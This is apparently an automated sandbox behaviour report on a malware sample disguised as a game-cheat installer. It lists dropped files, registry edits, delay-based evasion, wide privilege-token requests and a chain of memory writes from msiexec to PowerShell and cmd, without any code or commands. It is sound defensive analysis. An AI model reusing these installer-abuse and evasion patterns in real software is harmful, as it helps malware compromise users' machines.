File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIFB39.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFBD7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE2A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57f725.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI109D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3D65.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF28E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFC83.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF73.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF29F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57f721.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI352D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI361A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI37B4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3D35.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57f721.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI353E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3679.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI392C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3B11.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF9D1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFD8E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI36C8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIECD0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFE79.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\syswow64\MsiExec.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\syswow64\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4244 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe
PID 4244 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe
PID 4244 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe
PID 2124 wrote to memory of 3292 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2124 wrote to memory of 3292 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2124 wrote to memory of 3292 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5020 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 5020 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 5020 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 2124 wrote to memory of 4672 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2124 wrote to memory of 4672 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2124 wrote to memory of 4672 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4672 wrote to memory of 1864 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4672 wrote to memory of 1864 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1864 wrote to memory of 4708 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
